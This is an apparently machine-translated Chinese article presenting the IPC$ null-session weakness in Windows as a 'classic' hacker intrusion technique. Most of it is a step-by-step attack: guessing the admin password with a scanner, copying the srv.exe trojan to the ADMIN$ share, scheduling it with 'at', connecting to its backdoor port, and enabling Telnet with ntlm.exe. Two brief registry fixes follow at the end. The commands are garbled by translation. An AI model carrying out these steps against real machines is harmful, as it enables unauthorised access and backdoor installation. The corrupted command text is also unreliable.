网络黑客经典入侵技术综述(1)
评论:简介在网络入侵,我总结了以下几种常见的漏洞,进入方法和修复措施。:啤酒盖的传说,在这个神奇的网络世界,有一群习惯于夜间活动的人,他们崇尚自由,反对收费,同样的信念都是共享的,在人的眼睛,所有人都是平等的,也没有什么坚不可摧的墙,他们是mdash;mdash;黑客!
简介
在网络入侵,我总结了以下几种常见的漏洞,进入方法和修复措施。:啤酒盖的传说,在这个神奇的网络世界,有一群习惯于夜间活动的人,他们崇尚自由,反对收费,同样的信念都是共享的,在人的眼睛,所有人都是平等的,也没有什么坚不可摧的墙,他们是mdash;mdash;黑客!今天我们分享黑客使用的经典入侵技术。
一,永恒的IPC
困难:***入侵(中)
范围:**(中)
风险指数:假设(高)。
利用概率假设(高)
用好指数:75%
编辑部的评论:
众所周知,安全是一个非常及时的问题。取二百年前的打印机溢出和Unicode,这不是很好。
然而,似乎有一个例外,对IPC问题的攻击常常是新的。
什么是IPC漏洞:
IPC$是共享命名管道;;资源,主要用于程序间通信,用于计算机远程管理和查看计算机的共享资源。通过使用默认的IPC$,我们可以与目标主机建立一个空的连接(无需用户名和密码),和这个空的连接,我们可以得到目标主机上的用户列表。
我们总是IPC$漏洞IPC$漏洞,实际上说,IPC$不是真正意义上的漏洞,这是一个远程网络登录功能、方便的远程管理和开放管理,还要打开默认共享,即所有的逻辑盘(C D E美元,美元,美元hellip;hellip;WinNT或Windows)和目录系统(ADMIN$)。
所有的这些,初衷是为了方便管理员的管理,但良好的愿望不一定有好的结果,一些别有用心的人(代词是什么我不知道,心)将使用IPC$,访问共享资源,导出用户列表,并使用一些字典工具、密码检测,寄希望于获得更高的权限,从而达到目的不可泄露。
攻击工具:
扫描软件:流光4.71
木马软件:srv.exe
简单的攻击:
1。打开流光4.71
2。设置扫描前
三.假设在127.0.0.1存在IPC$漏洞,我们做到以下几点
C: >网使用$ > 127.0.0.1 IPC$ /用户:admintitrators / /这是用于扫流密码
C:复制srv.exe $ > 127.0.0.1 管理$ / / srv.exe复制有在工具目录下的流光
以下提示如下:
C: System32中
复制了1个文件。
C:净时间 127.0.0.1 / /检查的时间,这里的时间指的是其他的计算机,这是我们要入侵127.0.0.1的时间,并提醒大家注意的一点,请将时间24小时
C: >在 127.0.0.1 11:05 srv.exe / /在命令开始srv.exe
C:净时间 127.0.0.1 / /没有足够的时间检查一遍
C:telnet 127.0.0.1 99 /我们telnet,注意端口是99,因为在这里我们使用的是srv.exe。
C:复制ntlm.exe $ > 127.0.0.1 管理$ / /我们打开一个DOS窗口,该ntlm.exe上传到主机,在流光的工具目录
C:中 System32 > NTLM / / NTLM身份验证操作,其他机器的故障模式,所以我们可以直接通过telnet方式互相连接。
C: System32 >中
C:中 System32 >启动Telnet服务启动Telnet服务 / /然后直接启动Telnet
Telnet服务器正在启动。
Telnet服务器已成功。
在这一点上,我们可以直接使用telnet 127.0.0.1相互连接。
这是入侵的结束。
如何防守:
1。禁止建立空连接
{ hkey_local_machine 系统 CurrentControlSet 控制 LSA }
restrictanonymous = DWORD值:0000000 1
2。禁止管理共享
{ hkey_local_machine 系统 CurrentControlSet 服务 lanmanserver 参数}
autoshareserver = DWORD值:00000000